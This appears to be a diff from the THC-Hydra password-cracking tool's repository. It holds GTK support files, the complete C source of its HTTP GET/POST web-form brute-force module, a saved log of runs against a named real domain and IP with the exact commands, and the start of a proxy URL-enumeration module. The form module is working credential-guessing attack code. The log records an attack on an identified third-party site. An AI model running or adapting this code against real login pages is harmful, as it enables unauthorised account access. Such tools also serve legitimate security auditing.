#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <gtk/gtk.h>
#include "support.h"
GtkWidget *lookup_widget(GtkWidget * widget, const gchar * widget_name) {
GtkWidget *parent, *found_widget;
for (;;) {
if (GTK_IS_MENU(widget))
parent = gtk_menu_get_attach_widget(GTK_MENU(widget));
else
parent = widget->parent;
if (!parent)
parent = (GtkWidget *) g_object_get_data(G_OBJECT(widget), "GladeParentKey");
if (parent == NULL)
break;
widget = parent;
}
found_widget = (GtkWidget *) g_object_get_data(G_OBJECT(widget), widget_name);
if (!found_widget)
g_warning("Widget not found: %s", widget_name);
return found_widget;
}
static GList *pixmaps_directories = NULL;
/* Use this function to set the directory containing installed pixmaps. */
void add_pixmap_directory(const gchar * directory) {
pixmaps_directories = g_list_prepend(pixmaps_directories, g_strdup(directory));
}
/* This is an internally used function to find pixmap files. */
static gchar *find_pixmap_file(const gchar * filename) {
GList *elem;
/* We step through each of the pixmaps directory to find it. */
elem = pixmaps_directories;
while (elem) {
gchar *pathname = g_strdup_printf("%s%s%s", (gchar *) elem->data,
G_DIR_SEPARATOR_S, filename);
if (g_file_test(pathname, G_FILE_TEST_EXISTS))
return pathname;
g_free(pathname);
elem = elem->next;
}
return NULL;
}
/* This is an internally used function to create pixmaps. */
GtkWidget *create_pixmap(GtkWidget * widget, const gchar * filename) {
gchar *pathname = NULL;
GtkWidget *pixmap;
if (!filename || !filename[0])
return gtk_image_new();
pathname = find_pixmap_file(filename);
if (!pathname) {
g_warning("Couldn't find pixmap file: %s", filename);
return gtk_image_new();
}
pixmap = gtk_image_new_from_file(pathname);
g_free(pathname);
return pixmap;
}
/* This is an internally used function to create pixmaps. */
GdkPixbuf *create_pixbuf(const gchar * filename) {
gchar *pathname = NULL;
GdkPixbuf *pixbuf;
GError *error = NULL;
if (!filename || !filename[0])
return NULL;
pathname = find_pixmap_file(filename);
if (!pathname) {
g_warning("Couldn't find pixmap file: %s", filename);
return NULL;
}
pixbuf = gdk_pixbuf_new_from_file(pathname, &error);
if (!pixbuf) {
fprintf(stderr, "Failed to load pixbuf file: %s: %s\n", pathname, error->message);
g_error_free(error);
}
g_free(pathname);
return pixbuf;
}
/* This is used to set ATK action descriptions. */
void glade_set_atk_action_description(AtkAction * action, const gchar * action_name, const gchar * description) {
gint n_actions, i;
n_actions = atk_action_get_n_actions(action);
for (i = 0; i < n_actions; i++) {
if (!strcmp(atk_action_get_name(action, i), action_name))
atk_action_set_description(action, i, description);
}
}

45
hydra-gtk/src/support.h Executable file
View file

@ -0,0 +1,45 @@
/*
* DO NOT EDIT THIS FILE - it is generated by Glade.
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <gtk/gtk.h>
/*
* Public Functions.
*/
/*
* This function returns a widget in a component created by Glade.
* Call it with the toplevel widget in the component (i.e. a window/dialog),
* or alternatively any widget in the component, and the name of the widget
* you want returned.
*/
GtkWidget *lookup_widget(GtkWidget * widget, const gchar * widget_name);
/* Use this function to set the directory containing installed pixmaps. */
void add_pixmap_directory(const gchar * directory);
/*
* Private Functions.
*/
/* This is used to create the pixmaps used in the interface. */
GtkWidget *create_pixmap(GtkWidget * widget, const gchar * filename);
/* This is used to create the pixbufs used in the interface. */
GdkPixbuf *create_pixbuf(const gchar * filename);
/* This is used to set ATK action descriptions. */
void glade_set_atk_action_description(AtkAction * action, const gchar * action_name, const gchar * description);
GtkWidget *wndMain;
char *HYDRA_BIN;
guint message_id;

1
hydra-gtk/stamp-h.in Executable file
View file

@ -0,0 +1 @@
timestamp

2731
hydra-gtk/xhydra.glade Executable file
View file

File diff suppressed because it is too large Load diff

10
hydra-gtk/xhydra.gladep Executable file
View file

@ -0,0 +1,10 @@
<?xml version="1.0" standalone="no"?> <!--*- mode: xml -*-->
<!DOCTYPE glade-project SYSTEM "http://glade.gnome.org/glade-project-2.0.dtd">
<glade-project>
<name>Hydra_gtk</name>
<program_name>xhydra</program_name>
<gnome_support>FALSE</gnome_support>
<gettext_support>FALSE</gettext_support>
<use_widget_names>TRUE</use_widget_names>
</glade-project>

691
hydra-http-form.c Normal file
View file

@ -0,0 +1,691 @@
/*
Hydra Form Module
-----------------
The hydra form can be used to carry out a brute-force attack on simple
web-based login forms that require username and password variables via
either a GET or POST request.
The module works similarly to the HTTP basic auth module and will honour
proxy mode (with authenticaion) as well as SSL. The module can be invoked
with the service names of "http-get-form", "http-post-form",
"https-get-form" and "https-post-form".
Here's a couple of examples: -
./hydra -l "<userID>" -P pass.txt 10.221.64.12 http-post-form
"/irmlab2/testsso-auth.do:ID=^USER^&Password=^PASS^:Invalid Password"
./hydra -S -s 443 -l "<username>" -P pass.txt 10.221.64.2 https-get-form
"/irmlab1/vulnapp.php:username=^USER^&pass=^PASS^:incorrect"
The option field (following the service field) takes three ":" separated
values and an optional fourth value, the first is the page on the server
to GET or POST to, the second is the POST/GET variables (taken from either
the browser, or a proxy such as PAROS) with the varying usernames and passwords
in the "^USER^" and "^PASS^" placeholders, the third is the string that it
checks for an *invalid* or *valid* login - any exception to this is counted
as a success.
So please:
* invalid condition login should be preceded by "F="
* valid condition login should be preceded by "S=".
By default, if no header is found the condition is assume to be a fail,
so checking for *invalid* login.
The fourth optional value, can be a 'C' to define a different page to GET
initial cookies from.
If you specify the verbose flag (-v) it will show you the response from the
HTTP server which is useful for checking the result of a failed login to
find something to pattern match against.
Module initially written by Phil Robinson, IRM Plc (releases@irmplc.com),
rewritten by David Maciejak
Fix and issue with strtok use and implement 1 step location follow if HTTP
3xx code is returned (david dot maciejak at gmail dot com)
Added fail or success condition, getting cookies, and allow 5 redirections by david
*/
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
char *cond;
int success_cond = 0;
int getcookie = 1;
int auth_flag = 0;
char redirected_url_buff[2048] = "";
int redirected_flag = 0;
#define MAX_REDIRECT 8
int redirected_cpt = MAX_REDIRECT;
char cookie[4096] = "", cmiscptr[1024];
extern char *webtarget;
extern char *slash;
int webport, freemischttpform = 0;
char bufferurl[1024], cookieurl[1024] = "", userheader[1024] = "", *url, *variables, *optional1;
int strpos(char *str, char *target) {
char *res = strstr(str, target);
if (res == NULL)
return -1;
else
return res - str;
}
char *html_encode(char *string) {
char *ret = string;
if (ret == NULL)
return NULL;
if (index(ret, '%') != NULL)
ret = hydra_strrep(ret, "%", "%25");
if (index(ret, ' ') != NULL)
ret = hydra_strrep(ret, " ", "%20");
if (index(ret, '&') != NULL)
ret = hydra_strrep(ret, "&", "%26");
if (index(ret, '#') != NULL)
ret = hydra_strrep(ret, "&", "%23");
return ret;
}
/*
int analyze_server_response(int socket)
return 0 or 1 when the cond regex is matched
return -1 if no response from server
*/
int analyze_server_response(int s) {
int runs = 0;
while ((buf = hydra_receive_line(s)) != NULL) {
runs++;
//check for http redirection
if (strstr(buf, "HTTP/1.1 3") != NULL || strstr(buf, "HTTP/1.0 3") != NULL || strstr(buf, "Status: 3") != NULL) {
redirected_flag = 1;
} else if (strstr(buf, "HTTP/1.1 401") != NULL || strstr(buf, "HTTP/1.0 401") != NULL) {
auth_flag = 1;
} else if ((strstr(buf, "HTTP/1.1 403") != NULL) || (strstr(buf, "HTTP/1.1 404") != NULL) || (strstr(buf, "HTTP/1.0 403") != NULL) || (strstr(buf, "HTTP/1.0 404") != NULL)) {
return 0;
}
if (hydra_strcasestr(buf, "Location: ") != NULL) {
char *startloc, *endloc;
char str[2048];
startloc = hydra_strcasestr(buf, "Location: ") + strlen("Location: ");
strncpy(str, startloc, sizeof(str) - 1);
str[sizeof(str) - 1] = 0;
endloc = strchr(str, '\n');
if (endloc != NULL)
*endloc = 0;
endloc = strchr(str, '\r');
if (endloc != NULL)
*endloc = 0;
strcpy(redirected_url_buff, str);
}
//there can be multiple cookies
if (hydra_strcasestr(buf, "Set-Cookie: ") != NULL) {
char *cookiebuf = buf;
do {
char *startcookie, *endcookie1, *endcookie2;
char str[1024], tmpcookie[4096] = "", tmpname[128] = "", *ptr, *ptr2;
memset(str, 0, sizeof(str));
startcookie = hydra_strcasestr(cookiebuf, "Set-Cookie: ") + strlen("Set-Cookie: ");
strncpy(str, startcookie, sizeof(str) - 1);
str[sizeof(str) - 1] = 0;
endcookie1 = strchr(str, '\n');
endcookie2 = strchr(str, ';');
//terminate string after cookie data
if (endcookie1 != NULL && endcookie1 < endcookie2)
*endcookie1 = 0;
else if (endcookie2 != NULL)
*endcookie2 = 0;
// is the cookie already there? if yes, remove it!
if (index(startcookie, '=') != NULL && (ptr = index(startcookie, '=')) - startcookie + 1 <= sizeof(tmpname)) {
strncpy(tmpname, startcookie, sizeof(tmpname) - 2);
tmpname[sizeof(tmpname) - 2] = 0;
ptr = index(tmpname, '=');
*(++ptr) = 0;
// is the cookie already in the cookiejar? (so, does it have to be replaced?)
if ((ptr = hydra_strcasestr(cookie, tmpname)) != NULL) {
// yes it is.
// if the cookie is not in the beginning of the cookiejar, copy the ones before
if (ptr != cookie && *(ptr - 1) == ' ') {
strncpy(tmpcookie, cookie, ptr - cookie - 2);
tmpcookie[ptr - cookie - 2] = 0;
}
ptr += strlen(tmpname);
// if there are any cookies after this one in the cookiejar, copy them over
if ((ptr2 = strstr(ptr, "; ")) != NULL) {
ptr2 += 2;
strncat(tmpcookie, ptr2, sizeof(tmpcookie) - strlen(tmpcookie) - 1);
}
if (debug)
printf("[DEBUG] removing cookie %s in jar\n before: %s\n after: %s\n", tmpname, cookie, tmpcookie);
strcpy(cookie, tmpcookie);
}
}
ptr = index(str, '=');
// only copy the cookie if it has a value (otherwise the server wants to delete the cookie
if (ptr != NULL && *(ptr + 1) != ';' && *(ptr + 1) != 0 && *(ptr + 1) != '\n' && *(ptr + 1) != '\r') {
if (strlen(cookie) > 0)
strncat(cookie, "; ", sizeof(cookie) - strlen(cookie) - 1);
strncat(cookie, str, sizeof(cookie) - strlen(cookie) - 1);
}
cookiebuf = startcookie;
} while (hydra_strcasestr(cookiebuf, "Set-Cookie: ") != NULL);
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, cond) == 1) {
#else
if (strstr(buf, cond) != NULL) {
#endif
free(buf);
// printf("DEBUG: STRING %s FOUND!!:\n%s\n", cond, buf);
return 1;
}
// else printf("DEBUG: STRING %s NOT FOUND:\n%s\n", cond, buf);
free(buf);
}
if (runs == 0) {
if (debug)
hydra_report(stderr, "DEBUG: no response from server\n");
return -1;
}
return 0;
}
void hydra_reconnect(int s, char *ip, int port, unsigned char options) {
if (s >= 0)
s = hydra_disconnect(s);
if ((options & OPTION_SSL) == 0) {
s = hydra_connect_tcp(ip, port);
} else {
s = hydra_connect_ssl(ip, port);
}
}
int start_http_form(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char *type) {
char *empty = "";
char *login, *pass, buffer[9000], clogin[256], cpass[256];
char header[8096], *upd3variables, cuserheader[1024];
int found = !success_cond, i, j;
memset(header, 0, sizeof(header));
cookie[0] = 0; // reset cookies from potential previous attempt
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
strncpy(clogin, html_encode(login), sizeof(clogin) - 1);
clogin[sizeof(clogin) - 1] = 0;
strncpy(cpass, html_encode(pass), sizeof(cpass) - 1);
cpass[sizeof(cpass) - 1] = 0;
upd3variables = hydra_strrep(variables, "^USER^", clogin);
upd3variables = hydra_strrep(upd3variables, "^PASS^", cpass);
if (strstr(userheader, "^USER^") == NULL && strstr(userheader, "^PASS^") == NULL) {
strcpy(cuserheader, userheader);
} else { // we use the encoded version
strncpy(cuserheader, hydra_strrep(userheader, "^USER^", clogin), sizeof(cuserheader) - 1);
cuserheader[sizeof(cuserheader) - 1] = 0;
strncpy(cuserheader, hydra_strrep(cuserheader, "^PASS^", cpass), sizeof(cuserheader) - 1);
cuserheader[sizeof(cuserheader) - 1] = 0;
}
/* again: no snprintf to be portable. dont worry, buffer cant overflow */
if (use_proxy == 1 && proxy_authentication != NULL) {
// proxy with authentication
if (getcookie) {
//doing a GET to save cookies
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla 5.0 (Hydra Proxy Auth)\r\n%s%s\r\n",
webtarget, webport, cookieurl, webtarget, proxy_authentication, header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
i = analyze_server_response(s); // return value ignored
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
hydra_reconnect(s, ip, port, options);
}
if (strcmp(type, "POST") == 0) {
sprintf(buffer,
"POST http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy Auth)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s",
webtarget, webport, url, webtarget, proxy_authentication, (int) strlen(upd3variables), header, cuserheader, upd3variables);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
} else {
sprintf(buffer,
"GET http://%s:%d%.600s?%s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy Auth)\r\n%s%s\r\n",
webtarget, webport, url, upd3variables, webtarget, proxy_authentication, header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
}
} else {
if (use_proxy == 1) {
// proxy without authentication
if (getcookie) {
//doing a GET to get cookies
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy)\r\n%s%s\r\n", webtarget, webport, cookieurl, webtarget, header,
cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
i = analyze_server_response(s); // ignore result
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
hydra_reconnect(s, ip, port, options);
}
if (strcmp(type, "POST") == 0) {
sprintf(buffer,
"POST http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s",
webtarget, webport, url, webtarget, (int) strlen(upd3variables), header, cuserheader, upd3variables);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
} else {
sprintf(buffer, "GET http://%s:%d%.600s?%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s%s\r\n", webtarget, webport, url, upd3variables, webtarget,
header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
}
} else {
// direct web server, no proxy
if (getcookie) {
//doing a GET to save cookies
sprintf(buffer, "GET %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s\r\n", cookieurl, webtarget, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
i = analyze_server_response(s); // ignore result
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
hydra_reconnect(s, ip, port, options);
}
if (strcmp(type, "POST") == 0) {
sprintf(buffer,
"POST %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s",
url, webtarget, (int) strlen(upd3variables), header, cuserheader, upd3variables);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
} else {
sprintf(buffer, "GET %.600s?%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s%s\r\n", url, upd3variables, webtarget, header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
}
}
}
found = analyze_server_response(s);
if (auth_flag) { // we received a 401 error - user using wrong module
hydra_report(stderr, "[ERROR] the target is using HTTP auth, not a web form, received HTTP error code 401. Use module \"http%s-get\" instead.\n",
(options & OPTION_SSL) > 0 ? "s" : "");
return 4;
}
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %.1000s\r\n", cookie);
}
//if page was redirected, follow the location header
redirected_cpt = MAX_REDIRECT;
if (debug)
printf("[DEBUG] attempt result: found %d, redirect %d, location: %s\n", found, redirected_flag, redirected_url_buff);
while (found == 0 && redirected_flag && (redirected_url_buff[0] != 0) && (redirected_cpt > 0)) {
//we have to split the location
char *startloc, *endloc;
char str[2048];
char str2[2048];
char str3[2048];
redirected_cpt--;
redirected_flag = 0;
//check if the redirect page contains the fail/success condition
#ifdef HAVE_PCRE
if (hydra_string_match(redirected_url_buff, cond) == 1) {
#else
if (strstr(redirected_url_buff, cond) != NULL) {
#endif
found = success_cond;
} else {
//location could be either absolute http(s):// or / something
//or relative
startloc = strstr(redirected_url_buff, "://");
if (startloc != NULL) {
startloc += strlen("://");
if ((endloc = strchr(startloc, '\r')) != NULL) {
startloc[endloc - startloc] = 0;
}
if ((endloc = strchr(startloc, '\n')) != NULL) {
startloc[endloc - startloc] = 0;
}
strcpy(str, startloc);
endloc = strchr(str, '/');
if (endloc != NULL) {
strncpy(str2, str, endloc - str);
str2[endloc - str] = 0;
} else
strncpy(str2, str, sizeof(str));
if (strlen(str) - strlen(str2) == 0) {
strcpy(str3, "/");
} else {
strncpy(str3, str + strlen(str2), strlen(str) - strlen(str2) - 1);
str3[strlen(str) - strlen(str2) - 1] = 0;
}
} else {
strncpy(str2, webtarget, sizeof(str2));
if (redirected_url_buff[0] != '/') {
//it's a relative path, so we have to concatenate it
//with the path from the first url given
char *urlpath;
char urlpath_extracted[2048];
memset(urlpath_extracted, 0, sizeof(urlpath_extracted));
urlpath = strrchr(url, '/');
if (urlpath != NULL) {
strncpy(urlpath_extracted, url, urlpath - url);
sprintf(str3, "%.1000s/%.1000s", urlpath_extracted, redirected_url_buff);
} else {
sprintf(str3, "%.1000s/%.1000s", url, redirected_url_buff);
}
} else
strncpy(str3, redirected_url_buff, sizeof(str3));
if (debug)
hydra_report(stderr, "[DEBUG] host=%s redirect=%s origin=%s\n", str2, str3, url);
}
if (str3[0] != '/') {
j = strlen(str3);
str3[j + 1] = 0;
for (i = j; i > 0; i--)
str3[i] = str3[i - 1];
str3[0] = '/';
}
if (verbose)
hydra_report(stderr, "[VERBOSE] Page redirected to http://%s%s\n", str2, str3);
//re-use the code above to check for proxy use
if (use_proxy == 1 && proxy_authentication != NULL) {
// proxy with authentication
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n",
webtarget, webport, str3, str2, proxy_authentication, header);
} else {
if (use_proxy == 1) {
// proxy without authentication
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", webtarget, webport, str3, str2, header);
} else {
//direct web server, no proxy
sprintf(buffer, "GET %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", str3, str2, header);
}
}
hydra_reconnect(s, ip, port, options);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
found = analyze_server_response(s);
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
}
}
//if the last status is still 3xx, set it as a false
if (found != -1 && found == success_cond && redirected_flag == 0 && redirected_cpt >= 0) {
hydra_report_found_host(port, ip, "www-form", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
return 1;
}
void service_http_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char *type) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP, mysslport = PORT_HTTP_SSL;
char *ptr, *ptr2;
hydra_register_socket(sp);
if (webtarget != NULL && (webtarget = strstr(miscptr, "://")) != NULL) {
webtarget += strlen("://");
if ((ptr2 = index(webtarget, ':')) != NULL) { /* step over port if present */
*ptr2 = 0;
ptr2++;
ptr = ptr2;
if (*ptr == '/' || (ptr = index(ptr2, '/')) != NULL)
miscptr = ptr;
else
miscptr = slash; /* to make things easier to user */
} else if ((ptr2 = index(webtarget, '/')) != NULL) {
if (freemischttpform == 0) {
freemischttpform = 1;
miscptr = malloc(strlen(ptr2) + 1);
strcpy(miscptr, ptr2);
*ptr2 = 0;
}
} else
webtarget = NULL;
}
if (cmdlinetarget != NULL && webtarget == NULL)
webtarget = cmdlinetarget;
else if (webtarget == NULL && cmdlinetarget == NULL)
webtarget = hydra_address2string(ip);
if (port != 0)
webport = port;
else if ((options & OPTION_SSL) == 0)
webport = myport;
else
webport = mysslport;
sprintf(bufferurl, "%.1000s", miscptr);
url = bufferurl;
ptr = url;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
variables = ptr;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
cond = ptr;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
optional1 = ptr;
if (strstr(url, "\\:") != NULL) {
if ((ptr = malloc(strlen(url))) != NULL) { // no need for +1
strcpy(ptr, hydra_strrep(url, "\\:", ":"));
url = ptr;
}
}
if (strstr(variables, "\\:") != NULL) {
if ((ptr = malloc(strlen(variables))) != NULL) { // no need for +1
strcpy(ptr, hydra_strrep(variables, "\\:", ":"));
variables = ptr;
}
}
if (strstr(cond, "\\:") != NULL) {
if ((ptr = malloc(strlen(cond))) != NULL) { // no need for +1
strcpy(ptr, hydra_strrep(cond, "\\:", ":"));
cond = ptr;
}
}
if (url == NULL || variables == NULL || cond == NULL /*|| optional1 == NULL */ )
hydra_child_exit(2);
//printf("url: %s, var: %s, cond: %s, opt: %s\n", url, variables, cond, optional1);
if (*cond == 0) {
fprintf(stderr, "[ERROR] invalid number of parameters in module option\n");
hydra_child_exit(2);
}
sprintf(cookieurl, "%.1000s", url);
//conditions now have to contain F or S to set the fail or success condition
if (*cond != 0 && (strpos(cond, "F=") == 0)) {
success_cond = 0;
cond += 2;
} else if (*cond != 0 && (strpos(cond, "S=") == 0)) {
success_cond = 1;
cond += 2;
} else {
//by default condition is a fail
success_cond = 0;
}
while ( /*(optional1 = strtok(NULL, ":")) != NULL */ *optional1 != 0) {
switch (optional1[0]) {
case 'c': // fall through
case 'C':
ptr = optional1 + 2;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
sprintf(cookieurl, "%.1000s", hydra_strrep(optional1 + 2, "\\:", ":"));
optional1 = ptr;
break;
case 'h': // fall through
case 'H':
ptr = optional1 + 2;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
ptr2 = ptr;
while (*ptr2 != 0 && (*ptr2 != ':' || *(ptr2 - 1) == '\\'))
ptr2++;
if (*ptr2 != 0)
*ptr2++ = 0;
if (sizeof(userheader) - strlen(userheader) > 4) {
strncat(userheader, optional1 + 2, sizeof(userheader) - strlen(userheader) - 4);
strcat(userheader, ":");
strncat(userheader, hydra_strrep(ptr, "\\:", ":"), sizeof(userheader) - strlen(userheader) - 3);
strcat(userheader, "\r\n");
}
optional1 = ptr2;
break;
// no default
}
}
while (1) {
if (run == 2) {
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(1);
}
}
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http_form(sock, ip, port, options, miscptr, fp, type);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(0);
break;
case 4: /* silent error exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(1);
break;
default:
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
if (freemischttpform)
free(miscptr);
}
void service_http_get_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http_form(ip, sp, options, miscptr, fp, port, "GET");
}
void service_http_post_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http_form(ip, sp, options, miscptr, fp, port, "POST");
}
int service_http_form_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

30
hydra-http-post-attack.txt Executable file
View file

@ -0,0 +1,30 @@
# Hydra v7.4 run at 2012-09-23 14:49:45 on pualounge.de http-post-form (hydra -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 5
[80][www-form] host: 85.214.74.73 login: foo password: 9
[80][www-form] host: 85.214.74.73 login: foo password: 2
[80][www-form] host: 85.214.74.73 login: foo password: 6
[80][www-form] host: 85.214.74.73 login: foo password: 3
[80][www-form] host: 85.214.74.73 login: foo password: 1
[80][www-form] host: 85.214.74.73 login: foo password: 8
[80][www-form] host: 85.214.74.73 login: foo password: 7
[80][www-form] host: 85.214.74.73 login: foo password: 4
[80][www-form] host: 85.214.74.73 login: foo password: 10
# Hydra v7.4 run at 2012-09-23 14:50:25 on pualounge.de http-post-form (hydra -V -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 2
[80][www-form] host: 85.214.74.73 login: foo password: 1
[80][www-form] host: 85.214.74.73 login: foo password: 3
[80][www-form] host: 85.214.74.73 login: foo password: 4
[80][www-form] host: 85.214.74.73 login: foo password: 5
[80][www-form] host: 85.214.74.73 login: foo password: 7
[80][www-form] host: 85.214.74.73 login: foo password: 6
[80][www-form] host: 85.214.74.73 login: foo password: 8
[80][www-form] host: 85.214.74.73 login: foo password: 9
[80][www-form] host: 85.214.74.73 login: foo password: 10
# Hydra v7.4 run at 2012-09-23 14:50:33 on pualounge.de http-post-form (hydra -V -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 3
[80][www-form] host: 85.214.74.73 login: foo password: 1
[80][www-form] host: 85.214.74.73 login: foo password: 4
[80][www-form] host: 85.214.74.73 login: foo password: 2
[80][www-form] host: 85.214.74.73 login: foo password: 5
[80][www-form] host: 85.214.74.73 login: foo password: 7
[80][www-form] host: 85.214.74.73 login: foo password: 8
[80][www-form] host: 85.214.74.73 login: foo password: 9
[80][www-form] host: 85.214.74.73 login: foo password: 6
[80][www-form] host: 85.214.74.73 login: foo password: 10

288
hydra-http-proxy-urlenum.c Normal file
View file

@ -0,0 +1,288 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
static int http_proxy_auth_mechanism = AUTH_ERROR;
int start_http_proxy_urlenum(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500], mlogin[260], mpass[260], mhost[260];
char url[260], host[30];
char *header = ""; /* XXX TODO */
char *ptr;
int auth = 0;
login = hydra_get_next_login();
if (login == NULL || strlen(login) == 0 || strstr(login, "://") == NULL) {
hydra_completed_pair();
return 1;
}
pass = hydra_get_next_password();
pass = empty; // ignored
strncpy(url, login, sizeof(url) - 1);
url[sizeof(url) - 1] = 0;
ptr = strstr(login, "://") + 3;
if (ptr[0] == '[')
ptr++;
strncpy(mhost, ptr, sizeof(mhost) - 1);
mhost[sizeof(mhost) - 1] = 0;
if ((ptr = index(mhost, '/')) != NULL)
*ptr = 0;
if ((ptr = index(mhost, ']')) != NULL)
*ptr = 0;
else if ((ptr = index(mhost, ':')) != NULL)
*ptr = 0;
if (miscptr != NULL && index(miscptr, ':') != NULL) {
strncpy(mlogin, miscptr, sizeof(mlogin) - 1);
mlogin[sizeof(mlogin) - 1] = 0;
ptr = index(mlogin, ':');
*ptr++ = 0;
strncpy(mpass, ptr, sizeof(mpass) - 1);
mpass[sizeof(mpass) - 1] = 0;
auth = 1;
}
if (http_proxy_auth_mechanism == AUTH_ERROR) {
//send dummy request
sprintf(buffer, "GET %s HTTP/1.0\r\n%sUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, mhost, header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive first 40x
